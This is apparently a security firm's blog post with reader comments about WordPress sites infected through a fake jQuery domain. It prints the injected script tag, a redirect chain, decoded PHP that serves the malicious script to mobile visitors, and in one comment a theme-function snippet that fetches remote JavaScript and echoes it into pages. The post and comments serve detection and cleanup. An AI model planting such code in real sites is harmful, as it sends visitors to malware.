A few days ago we posted in our Labs notes about a Fake jQuery website that is distributing malware. The domain was properly chosen to confuse the end-users ( jquery-framework.com ), since it looks like a valid site.
This is what we were seeing injected on some websites:
<script src="httx://jquery-framework.com/jquery-1.7.1.js..
Some people have even complained to us that we’re flagging jQuery by mistake. However, when you visit that page you see that it does not have the jQuery code, just a redirection to http://browser-31.com/:
window.location = "httx://browser-31.com/s/3013";
Which then redirects the browser to additional malicious domains. This is the full path:
http://browser-31.com/s/3013 -> http://browser-31.com/ -> http://exmobi.org/ -> http://exmobi.org//?TCFL7295a460c02994eeff6c4089e21d24c4=0064f9c1307b53e92d675b76009102e1 or http://browser-31.com/s/3013 -> http://4redirect.me/in.cgi?5 -> http://sys-traf.ru/?i=5622 -> http://moby-c.ru/?r=10997 -> http://wap-trafik.ru/tb.php
Compromised WordPress sites
Since we initially started seeing this and posted in our Labs, we’re seeing even more websites compromised with it (mostly on outdated WordPress). We had the chance to analyze some of them and they had the following eval code being used to hide the malware (inside the theme files):
eval ("145166141154�50142 .. 141163145�66�64137")
Which when decoded executes the following:
if ((preg_match("/text/vnd.wap.wml|application/vnd.wap.xhtml+xml/si", @$_SERVER["HTTP_ACCEPT'].. ||preg_match('/alcatel|amoi|android|avantgo|blackberry|..
|iphone|ipad|ipaq|ipod|j2me|java|opera.mini|midp|mmp|mobi|motorola
|nec-|nokia|palm|panasonic|philips|phone|sagem|sharp|sie-|smartphone|sony|symbian|
vodafone|wap|webos|wireless|xda|xoom|zte/si', @$_SERVER['HTTP_USER_AGENT']) ||
preg_match('/msearch|m?q=/si', @$_SERVER['HTTP_REFERER'])) &&
!preg_match('/macintosh|america|avant|download|windows-media-player|yandex|google/si',
@$_SERVER['HTTP_USER_AGENT'])) { echo "<script src="httx://jquery-framework.com/jquery-1.7.1.js"..';
flush();
exit; }
If you are not familiar with PHP, it will check if you are visiting the site from a mobile phone (ipod, ipad, iphone, etc) and if you are, it inserts the jquery-framework.com code on the site. Since Google (and other AV blacklists) aren’t flagging this domain, users will receive no warning of what is happening.
We’re definitely flagging it, make sure to scan your site for free using Sucuri SiteCheck to make sure you’re good to go.
David Dede
Peter Gramantik
Pedro Peixoto
Tony Perez
Douglas Santos
13 comments
Have you seen this on any WordPress.com sites? They’re supposed to be invulnerable to this sort of thing but I’ve seen at least one this past week that displays bizarre signs of a classic hack.
this is definitely happening on wordpress sites. I’ve been working to clean some this last week. It’s a much more complex hack than this post details. The mobile redirect is only part of it. Some how they found a way in through an outdated wordpress install or plugin & have set up a hidden root user on our server. If you see this on any of your servers make sure to address it as quick as possible.
if you, or anyone, has any words of wisdom on how to handle this, i’d love to hear it. i’m totally lost and meanwhile people think the russians are after us.
We have just recovered one of our servers from this. An outdated wordpress install seemed to have been the access point, though we are still investigating some more.
Some random files were created in the folder of each domain, while the redirection on mobile devices was caused by a modified “.htaccess” file
thanks! there was a bunch of junk in the .htaccess file of the root folder so i deleted it, but the site still redirects on mobile devices. the only difference is that it redirects immediately to “browser-31” without going to “jquery-framework” first. i’m checking all the files modified around the time when the site went down, but i’m not sure what i should be looking for.
edit: fixed it like 5 minutes later. so as Daniel said, the .php files in the “themes” folder were affected, as you said, the .htaccess file in the root was affected, and i found the last bit in the index.php of the root folder, which looked like the eval code described above. hope this helps anyone else out.
That is not what I asked. WordPress.COM is different from WordPress.ORG and has some severe code restrictions specifically to prevent this kind of attack. Has it been seen on WordPress.com sites?
Hey there. We have not seen this on WordPress.com sites. That’s a different animal, and they do a pretty good job of reducing risk around these type of issues.
I had this in my functions.php of wordpress theme “http://www.jqueryc.com/jquery-1.6.3.min.js
I’ve just fixed one of our WordPress servers with this same error although I’m not sure what caused it in the first place so it might strike again.
To fix this I had to remove the eval code for all php files in the themes folder (>50 files in my case). Also I had to remove the eval code from index.php in the root directory as well as remove the extra lines added to .htaccess.
I had the same issue as described and i did a simple search in theme functions to find keyword “jquery”.
Go to:
Appearance > Editor> Theme Functions (right sidebar)
If working on a mac hit Command+F to search keywords
Type in “Jquery”.
This is what i found:
/* Define our theme URL constant */
if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”http://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);} if(!defined(‘WP_THEME_URL’)) {
define( ‘WP_THEME_URL’, get_template_directory_uri());
}
I just deleted it and problem solved… for now.
Hope this helps.
worked for me too!! thanks!
Comments are closed.